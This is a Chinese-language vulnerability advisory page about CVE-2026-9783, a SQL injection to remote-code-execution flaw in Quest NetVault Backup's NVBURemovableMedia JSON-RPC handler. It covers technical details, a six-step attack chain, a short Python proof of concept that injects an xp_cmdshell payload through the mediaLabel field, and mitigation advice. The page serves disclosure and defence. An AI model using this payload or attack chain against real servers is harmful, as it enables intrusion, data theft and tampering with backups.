IPBUF安全漏洞报告
English
CVE-2026-9783 CVSS 8.8 高危

CVE-2026-9783 Quest NetVault Backup SQL注入远程代码执行漏洞

披露日期: 2026-06-25

漏洞信息

漏洞编号
CVE-2026-9783
漏洞类型
SQL注入导致的远程代码执行(RCE)
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Quest NetVault Backup

相关标签

SQL注入远程代码执行RCEJSON-RPCQuest NetVault Backup身份认证绕过ZDI高危漏洞CVSS 8.8备份系统

漏洞概述

CVE-2026-9783是Quest NetVault Backup备份软件中存在的一个高危安全漏洞,CVSS评分为8.8分(CVSS:3.0)。该漏洞位于NetVault Backup的NVBURemovableMedia JSON-RPC消息处理模块中,由于对用户提供的字符串缺乏充分的验证和过滤,攻击者可以将恶意SQL语句注入到后端数据库查询中,从而实现远程代码执行(RCE)。

该漏洞由趋势科技零日计划(Zero Day Initiative, ZDI)的研究人员发现并报告,编号为ZDI-CAN-27632,对应的ZDI公告编号为ZDI-26-372。尽管利用此漏洞需要经过身份认证,但研究人员指出,现有的身份认证机制可以被绕过,这大大降低了攻击者的利用门槛。

成功利用此漏洞后,攻击者可以在目标系统上以NETWORK SERVICE权限执行任意代码,可能导致敏感数据泄露、系统被完全控制、备份数据被篡改或删除等严重后果。对于依赖NetVault Backup进行关键业务数据备份的企业和组织而言,该漏洞构成了重大安全威胁。Quest公司已在NetVault Backup 14.0.2版本的发布说明中确认并修复了该漏洞。

技术细节

该漏洞的核心问题存在于NetVault Backup服务对NVBURemovableMedia JSON-RPC消息的处理过程中。具体技术细节如下:

1. **漏洞入口点**:NetVault Backup通过JSON-RPC接口接收客户端发送的NVBURemovableMedia相关消息,用于管理可移动介质(如磁带等备份介质)的操作。

2. **注入原理**:在处理这些JSON-RPC消息时,服务端将用户提交的字符串参数直接拼接到SQL查询语句中,而未进行充分的参数化处理或输入验证。这使得攻击者可以在字符串参数中注入恶意SQL片段。

3. **认证绕过**:虽然NetVault Backup要求用户进行身份认证,但漏洞披露者指出其认证机制存在缺陷,攻击者可以通过特定手段绕过认证检查,直接访问存在漏洞的接口。

4. **权限提升至RCE**:通过SQL注入,攻击者可以操纵数据库执行系统级命令。在某些数据库配置下(如xp_cmdshell或类似功能),SQL注入可进一步升级为操作系统命令执行,实现完整的远程代码执行。

5. **执行上下文**:成功利用后,代码将以NETWORK SERVICE账户权限运行,该账户在Windows环境中具有一定的系统访问权限,攻击者可借此进行横向移动或权限提升。

该漏洞的攻击向量为网络(AV:N),攻击复杂度低(AC:L),所需权限为低权限(PR:L),无需用户交互(UI:N),对机密性、完整性和可用性均产生高影响。

攻击链分析

STEP 1
步骤1:信息收集与目标识别
攻击者通过扫描网络发现运行Quest NetVault Backup服务(默认端口8443)的目标系统,识别NVBURemovableMedia JSON-RPC接口端点。
STEP 2
步骤2:认证绕过
利用NetVault Backup认证机制中的缺陷,绕过身份验证检查,获取对JSON-RPC接口的访问权限(无需有效凭据或使用低权限账户)。
STEP 3
步骤3:构造恶意JSON-RPC请求
向NVBURemovableMedia接口发送精心构造的JSON-RPC消息,在用户可控的字符串参数(如mediaLabel)中嵌入SQL注入payload。
STEP 4
步骤4:SQL注入执行
服务端将未经验证的用户输入拼接到SQL查询中执行,攻击者通过注入的恶意SQL语句操纵后端数据库。
STEP 5
步骤5:权限提升与远程代码执行
利用数据库的命令执行功能(如xp_cmdshell)将SQL注入升级为操作系统命令执行,以NETWORK SERVICE权限在目标系统上运行任意代码。
STEP 6
步骤6:后渗透
攻击者获取系统控制权后,可窃取备份数据、植入持久化后门、进行横向移动,或破坏备份系统的完整性和可用性。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# CVE-2026-9783 - Quest NetVault Backup NVBURemovableMedia SQL Injection RCE # ZDI-CAN-27632 / ZDI-26-372 # Exploit concept: Send crafted JSON-RPC message to NVBURemovableMedia endpoint # with SQL injection payload in user-supplied string parameters. import requests import json TARGET_URL = "https://target-host:8443/services/NVBURemovableMedia" # Authentication bypass or valid low-privilege credentials AUTH_TOKEN = "BYPASSED_OR_LOW_PRIV_TOKEN" # SQL injection payload targeting the removable media parameter # The injected SQL is designed to escalate to RCE via database command execution sql_payload = ( "' UNION SELECT 1,2,3; " "EXEC xp_cmdshell('whoami > C:\\Windows\\Temp\\pwned.txt'; --" ) json_rpc_payload = { "jsonrpc": "2.0", "method": "NVBURemovableMedia.processRequest", "params": { "mediaLabel": sql_payload, "operation": "queryMedia" }, "id": 1 } headers = { "Content-Type": "application/json", "Authorization": f"Bearer {AUTH_TOKEN}" } response = requests.post( TARGET_URL, headers=headers, data=json.dumps(json_rpc_payload), verify=False ) print(f"Status: {response.status_code}") print(f"Response: {response.text}")

影响范围

Quest NetVault Backup < 14.0.2

防御指南

临时缓解措施
在无法立即升级到14.0.2版本的情况下,建议采取以下临时缓解措施:1)通过网络防火墙限制NetVault Backup管理端口(默认8443)的访问,仅允许可信管理主机连接;2)监控NVBURemovableMedia JSON-RPC接口的异常请求,特别是包含SQL关键字或特殊字符的请求;3)检查并修复认证绕过问题,确保所有API调用均经过严格的身份验证;4)限制后端数据库账户的权限,禁用xp_cmdshell等命令执行功能;5)部署入侵检测/防御系统(IDS/IPS)规则,检测SQL注入攻击特征。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表